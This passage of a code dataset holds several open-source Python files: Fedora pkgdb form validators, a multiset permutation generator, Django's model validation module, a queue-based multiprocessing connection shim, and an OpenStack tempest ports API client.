repo_name (stringlengths 5-100) | path (stringlengths 4-375) | copies (stringclasses, 991 values) | size (stringlengths 4-7) | content (stringlengths 666-1M) | license (stringclasses, 15 values) |
---|---|---|---|---|---|
fedora-infra/packagedb | pkgdb/lib/validators.py | 2 | 10016 |
# -*- coding: utf-8 -*-
#
# Copyright © 2008, 2010 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use, modify,
# copy, or redistribute it subject to the terms and conditions of the GNU
# General Public License v.2, or (at your option) any later version. This
# program is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the GNU
# General Public License along with this program; if not, write to the Free
# Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the source
# code or documentation are not subject to the GNU General Public License and
# may only be used or replicated with the express permission of Red Hat, Inc.
#
# Red Hat Author(s): Toshio Kuratomi <[email protected]>
#
'''
Collection of validators for parameters coming to pkgdb URLs.
'''
#
#pylint Explanations
#
# :E1101: SQLAlchemy monkey patches database fields into the mapper classes so
# we have to disable this when accessing an attribute of a mapped class.
# Validators also have a message() method which FormEncode adds in a way
# that pylint can't detect.
# :W0232: Validators don't need an __init__ method
# :W0613: Only a few validators use the state parameter
# :W0622: We have to redefine _ due to a FormEncode limitation
# :R0201: Validators are following an API specification so need certain
# methods that would otherwise be functions
# :R0903: Validators will usually only have two methods
#pylint:disable-msg=W0232,R0201,R0903,W0613
import re
from turbogears.validators import Invalid, FancyValidator, Set, Regex, \
UnicodeString
from sqlalchemy.exceptions import InvalidRequestError
try:
from fedora.textutils import to_unicode
except ImportError:
from pkgdb.lib.utils import to_unicode
from pkgdb.model import Collection
from pkgdb.lib.utils import STATUS
#pylint:disable-msg=W0622
def _(string):
''' *HACK*: TurboGears/FormEncode requires that we use a dummy _ function.
Internationalizing error messages won't work otherwise.
http://docs.turbogears.org/1.0/Internationalization#id13
'''
return string
#pylint:enable-msg=W0622
#
# SetOf validator can validate its elements
#
class SetOf(Set):
'''formencode Set() validator with the ability to validate its elements.
:kwarg element_validator: Validator to run on each of the elements of the set.
'''
element_validator = None
messages = {'incorrect_value': 'list values did not satisfy the element_validator'}
def validate_python(self, value, state):
if self.element_validator:
try:
value = map(self.element_validator.to_python, value)
except Invalid:
raise
except:
# Just in case the element validator doesn't throw an Invalid
# exception
raise Invalid(self.message('incorrect_value', state),
value, state)
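# Illustrative usage (not part of the original module): the element_validator
# keyword names the validator applied to every element of the incoming set,
# e.g. SetOf(element_validator=IsCollectionSimpleNameRegex()).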
#
# Three sorts of validators:
#
# 1) does minimal checking that a string looks sort of right
# - For these we'll mostly just use the standard tg and formencode
# validators.
# 2) Hits the db to verify that the string exists in the proper field
# - These are appropriate where we're going to use the string anyways. For
# instance, in a select statement.
# - These should be checked by making calls against something that's easily
# sent to a memcached or redis server.
# 3) Looks in the db and transforms the string into the type of thing that it
# is a key for
# - This will do an actual call into the database and load an ORM mapped
# object.
#
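#
# Illustrative sketch (not part of the original module) of how the three kinds
# differ in what they hand back, assuming a TurboGears/FormEncode Schema
# (e.g. `from turbogears import validators`); the schema and field names are
# hypothetical:
#
# class BranchSchema(validators.Schema):
#     branchname = IsCollectionSimpleNameRegex()   # 1) shape check only
#     shortname = IsCollectionSimpleName()         # 2) db-checked, returns the string
#     collection = IsCollection()                  # 3) db lookup, returns a Collection
#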
class IsCollectionSimpleNameRegex(Regex):
'''Test the collection simple name against a simple heuristic
:kwarg strip: If True, strips whitespace from the beginning and end of the
value. (default True)
:kwarg regex: regular expression object or string to be compiled to match
the simple name against. Default: r'^((FC|fc|f|F|EL|el|)-?[0-9]+|devel)$'
'''
strip = True
regex = re.compile(r'^((FC|fc|f|F|EL|el|)-?[0-9]+|devel)$')
messages = {'no_collection': _('%(collection)s does not match the pattern'
' for collection names')}
def _to_python(self, value, state):
value = Regex._to_python(self, value, state)
return to_unicode(value)
def validate_python(self, value, state):
if not self.regex.match(value):
raise Invalid(self.message('no_collection', state,
collection=value), value, state)
class IsCollectionSimpleName(UnicodeString):
'''Test that the value is a recognized collection short name.
:kwarg eol: If True, include eol releases. (default False)
:kwarg strip: If True, strips whitespace from the beginning and end of the
value. (default True)
'''
strip = True
eol = False
messages = {'no_collection': _('A collection named %(collection)s does'
' not exist'),
'eol_collection': _('Collection named %(collection)s is eol')
}
def validate_python(self, value, state):
try:
collection = Collection.by_simple_name(value)
except InvalidRequestError:
raise Invalid(self.message('no_collection', state,
collection=value), value, state)
if not self.eol and (collection.statuscode ==
STATUS['EOL']):
raise Invalid(self.message('eol_collection', state,
collection=value), value, state)
return value
class IsCollection(IsCollectionSimpleName):
'''Transforms a Collection simplename into a Collection.
:kwarg eol: If True, include eol releases. (default False)
:kwarg strip: If True, strips whitespace from the beginning and end of the
value. (default True)
:rtype: Collection
:returns: Collection that the simplename we were given references.
'''
messages = {'no_collection': _('A collection named %(collection)s does'
' not exist'),
'eol_collection': _('Collection named %(collection)s is eol')
}
def validate_python(self, value, state):
try:
collection = Collection.by_simple_name(value)
except InvalidRequestError:
raise Invalid(self.message('no_collection', state,
collection=value), value, state)
if not self.eol and (collection.statuscode ==
STATUS['EOL']):
raise Invalid(self.message('eol_collection', state,
collection=value), value, state)
return collection
#
# Legacy -- Remove when we update the API
#
class CollectionName(FancyValidator):
'''Test that the value is a recognized collection name.'''
messages = {'no_collection': _('A collection named %(collection)s does'
' not exist.')}
def _to_python(self, value, state):
'''Just remove leading and trailing whitespace.'''
return value.strip()
def validate_python(self, value, state):
'''Make sure the collection is in the database.'''
#pylint:disable-msg=E1101
try:
Collection.query.filter_by(name=value).first()
except InvalidRequestError:
raise Invalid(self.message('no_collection', state,
collection=value), value, state)
#pylint:enable-msg=E1101
#
# Chained Validators
#
# Note: Chained validators take different params so they are not interchangeable
# with normal validators:
# validate_python: field_dict instead of value. This is a dictionary of the
# fields passed into the schema.
#
# raising Invalid: error_dict. In addition to the other values to Invalid()
# we send an error_dict that maps the field to display an error with to the
# message.
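#
# Illustrative sketch (not part of the original module): a chained validator is
# attached to a Schema rather than to one field, so validate_python() receives
# the whole field_dict. The schema and field names here are hypothetical:
#
# class CollectionSchema(validators.Schema):
#     name = UnicodeString(if_empty=None)
#     version = UnicodeString(if_empty=None)
#     chained_validators = [CollectionNameVersion()]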
class CollectionNameVersion(FancyValidator):
'''Test the combination of a Collection and Version for validity.'''
messages = {'nameless_version': _('Version specified without a collection'
' name'),
'no_version': _('There is no collection for %(name)s-%(version)s'),
'no_collection': _('Collection named %(name)s does not exist')}
def validate_python(self, field_dict, state):
'''Make sure the Collection with the given `name` and `version` exists.
We want to allow for:
1) Neither to be set
2) Name to exist in the db and version unset
3) Name and version to exist in the db
'''
if not field_dict:
# It's okay for both to be none
return
errors = {}
name = field_dict.get('name')
version = field_dict.get('version')
if (not name) and version:
#pylint:disable-msg=E1101
errors['version'] = self.message('nameless_version', state)
elif name and version:
#pylint:disable-msg=E1101
try:
Collection.query.filter_by(name=name, version=version).one()
except InvalidRequestError:
errors['version'] = self.message('no_version', state,
name=name, version=version)
elif name and not version:
#pylint:disable-msg=E1101
try:
Collection.query.filter_by(name=name).first()
except InvalidRequestError:
errors['name'] = self.message('no_collection', state, name=name)
if errors:
error_list = sorted(errors.iteritems())
error_message = '\n'.join([u'%s: %s' % (error, msg)
for error, msg in error_list])
raise Invalid(error_message, field_dict, state,
error_dict=errors)
| gpl-2.0 |
ekg/multichoose | multipermute.py | 6 | 2680 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# multipermute.py - permutations of a multiset
# Erik Garrison <[email protected]> 2010
"""
This module encodes functions to generate the permutations of a multiset
following this algorithm:
Algorithm 1
Visits the permutations of multiset E. The permutations are stored
in a singly-linked list pointed to by head pointer h. Each node in the linked
list has a value field v and a next field n. The init(E) call creates a
singly-linked list storing the elements of E in non-increasing order with h, i,
and j pointing to its first, second-last, and last nodes, respectively. The
null pointer is given by φ. Note: If E is empty, then init(E) should exit.
Also, if E contains only one element, then init(E) does not need to provide a
value for i.
[h, i, j] ← init(E)
visit(h)
while j.n ≠ φ or j.v < h.v do
if j.n ≠ φ and i.v ≥ j.n.v then
s ← j
else
s ← i
end if
t ← s.n
s.n ← t.n
t.n ← h
if t.v < h.v then
i ← t
end if
j ← i.n
h ← t
visit(h)
end while
... from "Loopless Generation of Multiset Permutations using a Constant Number
of Variables by Prefix Shifts." Aaron Williams, 2009
"""
class ListElement:
def __init__(self, value, next):
self.value = value
self.next = next
def nth(self, n):
o = self
i = 0
while i < n and o.next is not None:
o = o.next
i += 1
return o
def init(multiset):
multiset.sort() # ensures proper non-increasing order
h = ListElement(multiset[0], None)
for item in multiset[1:]:
h = ListElement(item, h)
return h, h.nth(len(multiset) - 2), h.nth(len(multiset) - 1)
def visit(h):
"""Converts our bespoke linked list to a python list."""
o = h
l = []
while o is not None:
l.append(o.value)
o = o.next
return l
def permutations(multiset):
"""Generator providing all multiset permutations of a multiset."""
h, i, j = init(multiset)
yield visit(h)
while j.next is not None or j.value < h.value:
if j.next is not None and i.value >= j.next.value:
s = j
else:
s = i
t = s.next
s.next = t.next
t.next = h
if t.value < h.value:
i = t
j = i.next
h = t
yield visit(h)
if __name__ == '__main__':
import sys
multiset = sys.argv[1:]
if multiset != []:
for permutation in permutations(multiset):
for item in permutation:
print item,
print
else:
print "usage", sys.argv[0], "<multiset>"
| mit |
eltonsantos/django | django/core/management/validation.py | 107 | 23840 |
import collections
import sys
from django.conf import settings
from django.core.management.color import color_style
from django.utils.encoding import force_str
from django.utils.itercompat import is_iterable
from django.utils import six
class ModelErrorCollection:
def __init__(self, outfile=sys.stdout):
self.errors = []
self.outfile = outfile
self.style = color_style()
def add(self, context, error):
self.errors.append((context, error))
self.outfile.write(self.style.ERROR(force_str("%s: %s\n" % (context, error))))
def get_validation_errors(outfile, app=None):
"""
Validates all models that are part of the specified app. If no app name is provided,
validates all models of all installed apps. Writes errors, if any, to outfile.
Returns number of errors.
"""
from django.db import models, connection
from django.db.models.loading import get_app_errors
from django.db.models.deletion import SET_NULL, SET_DEFAULT
e = ModelErrorCollection(outfile)
for (app_name, error) in get_app_errors().items():
e.add(app_name, error)
for cls in models.get_models(app, include_swapped=True):
opts = cls._meta
# Check swappable attribute.
if opts.swapped:
try:
app_label, model_name = opts.swapped.split('.')
except ValueError:
e.add(opts, "%s is not of the form 'app_label.app_name'." % opts.swappable)
continue
if not models.get_model(app_label, model_name):
e.add(opts, "Model has been swapped out for '%s' which has not been installed or is abstract." % opts.swapped)
# No need to perform any other validation checks on a swapped model.
continue
# If this is the current User model, check known validation problems with User models
if settings.AUTH_USER_MODEL == '%s.%s' % (opts.app_label, opts.object_name):
# Check that REQUIRED_FIELDS is a list
if not isinstance(cls.REQUIRED_FIELDS, (list, tuple)):
e.add(opts, 'The REQUIRED_FIELDS must be a list or tuple.')
# Check that the USERNAME FIELD isn't included in REQUIRED_FIELDS.
if cls.USERNAME_FIELD in cls.REQUIRED_FIELDS:
e.add(opts, 'The field named as the USERNAME_FIELD should not be included in REQUIRED_FIELDS on a swappable User model.')
# Check that the username field is unique
if not opts.get_field(cls.USERNAME_FIELD).unique:
e.add(opts, 'The USERNAME_FIELD must be unique. Add unique=True to the field parameters.')
# Model isn't swapped; do field-specific validation.
for f in opts.local_fields:
if f.name == 'id' and not f.primary_key and opts.pk.name == 'id':
e.add(opts, '"%s": You can\'t use "id" as a field name, because each model automatically gets an "id" field if none of the fields have primary_key=True. You need to either remove/rename your "id" field or add primary_key=True to a field.' % f.name)
if f.name.endswith('_'):
e.add(opts, '"%s": Field names cannot end with underscores, because this would lead to ambiguous queryset filters.' % f.name)
if (f.primary_key and f.null and
not connection.features.interprets_empty_strings_as_nulls):
# We cannot reliably check this for backends like Oracle which
# consider NULL and '' to be equal (and thus set up
# character-based fields a little differently).
e.add(opts, '"%s": Primary key fields cannot have null=True.' % f.name)
if isinstance(f, models.CharField):
try:
max_length = int(f.max_length)
if max_length <= 0:
e.add(opts, '"%s": CharFields require a "max_length" attribute that is a positive integer.' % f.name)
except (ValueError, TypeError):
e.add(opts, '"%s": CharFields require a "max_length" attribute that is a positive integer.' % f.name)
if isinstance(f, models.DecimalField):
decimalp_ok, mdigits_ok = False, False
decimalp_msg = '"%s": DecimalFields require a "decimal_places" attribute that is a non-negative integer.'
try:
decimal_places = int(f.decimal_places)
if decimal_places < 0:
e.add(opts, decimalp_msg % f.name)
else:
decimalp_ok = True
except (ValueError, TypeError):
e.add(opts, decimalp_msg % f.name)
mdigits_msg = '"%s": DecimalFields require a "max_digits" attribute that is a positive integer.'
try:
max_digits = int(f.max_digits)
if max_digits <= 0:
e.add(opts, mdigits_msg % f.name)
else:
mdigits_ok = True
except (ValueError, TypeError):
e.add(opts, mdigits_msg % f.name)
invalid_values_msg = '"%s": DecimalFields require a "max_digits" attribute value that is greater than or equal to the value of the "decimal_places" attribute.'
if decimalp_ok and mdigits_ok:
if decimal_places > max_digits:
e.add(opts, invalid_values_msg % f.name)
if isinstance(f, models.FileField) and not f.upload_to:
e.add(opts, '"%s": FileFields require an "upload_to" attribute.' % f.name)
if isinstance(f, models.ImageField):
try:
from django.utils.image import Image
except ImportError:
e.add(opts, '"%s": To use ImageFields, you need to install Pillow. Get it at https://pypi.python.org/pypi/Pillow.' % f.name)
if isinstance(f, models.BooleanField) and getattr(f, 'null', False):
e.add(opts, '"%s": BooleanFields do not accept null values. Use a NullBooleanField instead.' % f.name)
if isinstance(f, models.FilePathField) and not (f.allow_files or f.allow_folders):
e.add(opts, '"%s": FilePathFields must have either allow_files or allow_folders set to True.' % f.name)
if isinstance(f, models.GenericIPAddressField) and not getattr(f, 'null', False) and getattr(f, 'blank', False):
e.add(opts, '"%s": GenericIPAddressField can not accept blank values if null values are not allowed, as blank values are stored as null.' % f.name)
if f.choices:
if isinstance(f.choices, six.string_types) or not is_iterable(f.choices):
e.add(opts, '"%s": "choices" should be iterable (e.g., a tuple or list).' % f.name)
else:
for c in f.choices:
if isinstance(c, six.string_types) or not is_iterable(c) or len(c) != 2:
e.add(opts, '"%s": "choices" should be a sequence of two-item iterables (e.g. list of 2 item tuples).' % f.name)
if f.db_index not in (None, True, False):
e.add(opts, '"%s": "db_index" should be either None, True or False.' % f.name)
# Perform any backend-specific field validation.
connection.validation.validate_field(e, opts, f)
# Check if the on_delete behavior is sane
if f.rel and hasattr(f.rel, 'on_delete'):
if f.rel.on_delete == SET_NULL and not f.null:
e.add(opts, "'%s' specifies on_delete=SET_NULL, but cannot be null." % f.name)
elif f.rel.on_delete == SET_DEFAULT and not f.has_default():
e.add(opts, "'%s' specifies on_delete=SET_DEFAULT, but has no default value." % f.name)
# Check to see if the related field will clash with any existing
# fields, m2m fields, m2m related objects or related objects
if f.rel:
if f.rel.to not in models.get_models():
# If the related model is swapped, provide a hint;
# otherwise, the model just hasn't been installed.
if not isinstance(f.rel.to, six.string_types) and f.rel.to._meta.swapped:
e.add(opts, "'%s' defines a relation with the model '%s.%s', which has been swapped out. Update the relation to point at settings.%s." % (f.name, f.rel.to._meta.app_label, f.rel.to._meta.object_name, f.rel.to._meta.swappable))
else:
e.add(opts, "'%s' has a relation with model %s, which has either not been installed or is abstract." % (f.name, f.rel.to))
# it is a string and we could not find the model it refers to
# so skip the next section
if isinstance(f.rel.to, six.string_types):
continue
# Make sure the related field specified by a ForeignKey is unique
if f.requires_unique_target:
if len(f.foreign_related_fields) > 1:
has_unique_field = False
for rel_field in f.foreign_related_fields:
has_unique_field = has_unique_field or rel_field.unique
if not has_unique_field:
e.add(opts, "Field combination '%s' under model '%s' must have a unique=True constraint" % (','.join([rel_field.name for rel_field in f.foreign_related_fields]), f.rel.to.__name__))
else:
if not f.foreign_related_fields[0].unique:
e.add(opts, "Field '%s' under model '%s' must have a unique=True constraint." % (f.foreign_related_fields[0].name, f.rel.to.__name__))
rel_opts = f.rel.to._meta
rel_name = f.related.get_accessor_name()
rel_query_name = f.related_query_name()
if not f.rel.is_hidden():
for r in rel_opts.fields:
if r.name == rel_name:
e.add(opts, "Accessor for field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.local_many_to_many:
if r.name == rel_name:
e.add(opts, "Accessor for field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.get_all_related_many_to_many_objects():
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
for r in rel_opts.get_all_related_objects():
if r.field is not f:
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
seen_intermediary_signatures = []
for i, f in enumerate(opts.local_many_to_many):
# Check to see if the related m2m field will clash with any
# existing fields, m2m fields, m2m related objects or related
# objects
if f.rel.to not in models.get_models():
# If the related model is swapped, provide a hint;
# otherwise, the model just hasn't been installed.
if not isinstance(f.rel.to, six.string_types) and f.rel.to._meta.swapped:
e.add(opts, "'%s' defines a relation with the model '%s.%s', which has been swapped out. Update the relation to point at settings.%s." % (f.name, f.rel.to._meta.app_label, f.rel.to._meta.object_name, f.rel.to._meta.swappable))
else:
e.add(opts, "'%s' has an m2m relation with model %s, which has either not been installed or is abstract." % (f.name, f.rel.to))
# it is a string and we could not find the model it refers to
# so skip the next section
if isinstance(f.rel.to, six.string_types):
continue
# Check that the field is not set to unique. ManyToManyFields do not support unique.
if f.unique:
e.add(opts, "ManyToManyFields cannot be unique. Remove the unique argument on '%s'." % f.name)
if f.rel.through is not None and not isinstance(f.rel.through, six.string_types):
from_model, to_model = cls, f.rel.to
if from_model == to_model and f.rel.symmetrical and not f.rel.through._meta.auto_created:
e.add(opts, "Many-to-many fields with intermediate tables cannot be symmetrical.")
seen_from, seen_to, seen_self = False, False, 0
for inter_field in f.rel.through._meta.fields:
rel_to = getattr(inter_field.rel, 'to', None)
if from_model == to_model: # relation to self
if rel_to == from_model:
seen_self += 1
if seen_self > 2:
e.add(opts, "Intermediary model %s has more than "
"two foreign keys to %s, which is ambiguous "
"and is not permitted." % (
f.rel.through._meta.object_name,
from_model._meta.object_name
)
)
else:
if rel_to == from_model:
if seen_from:
e.add(opts, "Intermediary model %s has more "
"than one foreign key to %s, which is "
"ambiguous and is not permitted." % (
f.rel.through._meta.object_name,
from_model._meta.object_name
)
)
else:
seen_from = True
elif rel_to == to_model:
if seen_to:
e.add(opts, "Intermediary model %s has more "
"than one foreign key to %s, which is "
"ambiguous and is not permitted." % (
f.rel.through._meta.object_name,
rel_to._meta.object_name
)
)
else:
seen_to = True
if f.rel.through not in models.get_models(include_auto_created=True):
e.add(opts, "'%s' specifies an m2m relation through model "
"%s, which has not been installed." % (f.name, f.rel.through)
)
signature = (f.rel.to, cls, f.rel.through)
if signature in seen_intermediary_signatures:
e.add(opts, "The model %s has two manually-defined m2m "
"relations through the model %s, which is not "
"permitted. Please consider using an extra field on "
"your intermediary model instead." % (
cls._meta.object_name,
f.rel.through._meta.object_name
)
)
else:
seen_intermediary_signatures.append(signature)
if not f.rel.through._meta.auto_created:
seen_related_fk, seen_this_fk = False, False
for field in f.rel.through._meta.fields:
if field.rel:
if not seen_related_fk and field.rel.to == f.rel.to:
seen_related_fk = True
elif field.rel.to == cls:
seen_this_fk = True
if not seen_related_fk or not seen_this_fk:
e.add(opts, "'%s' is a manually-defined m2m relation "
"through model %s, which does not have foreign keys "
"to %s and %s" % (f.name, f.rel.through._meta.object_name,
f.rel.to._meta.object_name, cls._meta.object_name)
)
elif isinstance(f.rel.through, six.string_types):
e.add(opts, "'%s' specifies an m2m relation through model %s, "
"which has not been installed" % (f.name, f.rel.through)
)
rel_opts = f.rel.to._meta
rel_name = f.related.get_accessor_name()
rel_query_name = f.related_query_name()
# If rel_name is none, there is no reverse accessor (this only
# occurs for symmetrical m2m relations to self). If this is the
# case, there are no clashes to check for this field, as there are
# no reverse descriptors for this field.
if rel_name is not None:
for r in rel_opts.fields:
if r.name == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.local_many_to_many:
if r.name == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.get_all_related_many_to_many_objects():
if r.field is not f:
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
for r in rel_opts.get_all_related_objects():
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
# Check ordering attribute.
if opts.ordering:
for field_name in opts.ordering:
if field_name == '?':
continue
if field_name.startswith('-'):
field_name = field_name[1:]
if opts.order_with_respect_to and field_name == '_order':
continue
# Skip ordering in the format field1__field2 (FIXME: checking
# this format would be nice, but it's a little fiddly).
if '__' in field_name:
continue
# Skip ordering on pk. This is always a valid order_by field
# but is an alias and therefore won't be found by opts.get_field.
if field_name == 'pk':
continue
try:
opts.get_field(field_name, many_to_many=False)
except models.FieldDoesNotExist:
e.add(opts, '"ordering" refers to "%s", a field that doesn\'t exist.' % field_name)
# Check unique_together.
for ut in opts.unique_together:
validate_local_fields(e, opts, "unique_together", ut)
if not isinstance(opts.index_together, collections.Sequence):
e.add(opts, '"index_together" must a sequence')
else:
for it in opts.index_together:
validate_local_fields(e, opts, "index_together", it)
return len(e.errors)
def validate_local_fields(e, opts, field_name, fields):
from django.db import models
if not isinstance(fields, collections.Sequence):
e.add(opts, 'all %s elements must be sequences' % field_name)
else:
for field in fields:
try:
f = opts.get_field(field, many_to_many=True)
except models.FieldDoesNotExist:
e.add(opts, '"%s" refers to %s, a field that doesn\'t exist.' % (field_name, field))
else:
if isinstance(f.rel, models.ManyToManyRel):
e.add(opts, '"%s" refers to %s. ManyToManyFields are not supported in %s.' % (field_name, f.name, field_name))
if f not in opts.local_fields:
e.add(opts, '"%s" refers to %s. This is not in the same model as the %s statement.' % (field_name, f.name, field_name))
| bsd-3-clause |
pombredanne/teamwork | exts/wsgi/static/Brython2.1.0-20140419-113919/Lib/multiprocessing/dummy/connection.py | 707 | 3049 |
#
# Analogue of `multiprocessing.connection` which uses queues instead of sockets
#
# multiprocessing/dummy/connection.py
#
# Copyright (c) 2006-2008, R Oudkerk
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of author nor the names of any contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
__all__ = [ 'Client', 'Listener', 'Pipe' ]
from queue import Queue
families = [None]
class Listener(object):
def __init__(self, address=None, family=None, backlog=1):
self._backlog_queue = Queue(backlog)
def accept(self):
return Connection(*self._backlog_queue.get())
def close(self):
self._backlog_queue = None
address = property(lambda self: self._backlog_queue)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
def Client(address):
_in, _out = Queue(), Queue()
address.put((_out, _in))
return Connection(_in, _out)
def Pipe(duplex=True):
a, b = Queue(), Queue()
return Connection(a, b), Connection(b, a)
class Connection(object):
def __init__(self, _in, _out):
self._out = _out
self._in = _in
self.send = self.send_bytes = _out.put
self.recv = self.recv_bytes = _in.get
def poll(self, timeout=0.0):
if self._in.qsize() > 0:
return True
if timeout <= 0.0:
return False
self._in.not_empty.acquire()
self._in.not_empty.wait(timeout)
self._in.not_empty.release()
return self._in.qsize() > 0
def close(self):
pass
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
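# Minimal usage sketch (not part of the original module): a Pipe() pair simply
# cross-wires two queues, so data sent on one end is received on the other.
#
# if __name__ == '__main__':
#     a, b = Pipe()
#     a.send('hello')
#     assert b.recv() == 'hello'
#     assert not b.poll()   # nothing left to read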
| gpl-2.0 |
vedujoshi/tempest | tempest/lib/services/network/ports_client.py | 2 | 3105 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.lib import exceptions as lib_exc
from tempest.lib.services.network import base
class PortsClient(base.BaseNetworkClient):
def create_port(self, **kwargs):
"""Creates a port on a network.
For a full list of available parameters, please refer to the official
API reference:
http://developer.openstack.org/api-ref/networking/v2/index.html#create-port
"""
uri = '/ports'
post_data = {'port': kwargs}
return self.create_resource(uri, post_data)
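# Illustrative call (not part of the original client); the network id is
# hypothetical: client.create_port(network_id='<net-uuid>', name='port-1')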
def update_port(self, port_id, **kwargs):
"""Updates a port.
For a full list of available parameters, please refer to the official
API reference:
http://developer.openstack.org/api-ref/networking/v2/index.html#update-port
"""
uri = '/ports/%s' % port_id
post_data = {'port': kwargs}
return self.update_resource(uri, post_data)
def show_port(self, port_id, **fields):
"""Shows details for a port.
For a full list of available parameters, please refer to the official
API reference:
http://developer.openstack.org/api-ref/networking/v2/index.html#show-port-details
"""
uri = '/ports/%s' % port_id
return self.show_resource(uri, **fields)
def delete_port(self, port_id):
"""Deletes a port.
For a full list of available parameters, please refer to the official
API reference:
http://developer.openstack.org/api-ref/networking/v2/index.html#delete-port
"""
uri = '/ports/%s' % port_id
return self.delete_resource(uri)
def list_ports(self, **filters):
"""Lists ports to which the tenant has access.
For a full list of available parameters, please refer to the official
API reference:
http://developer.openstack.org/api-ref/networking/v2/index.html#list-ports
"""
uri = '/ports'
return self.list_resources(uri, **filters)
def create_bulk_ports(self, **kwargs):
"""Create multiple ports in a single request.
For a full list of available parameters, please refer to the official
API reference:
http://developer.openstack.org/api-ref/networking/v2/index.html#bulk-create-ports
"""
uri = '/ports'
return self.create_resource(uri, kwargs)
def is_resource_deleted(self, id):
try:
self.show_port(id)
except lib_exc.NotFound:
return True
return False
| apache-2.0 |
xbezdick/tempest | tempest/services/compute/json/floating_ip_pools_client.py | 6 | 1314 |
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
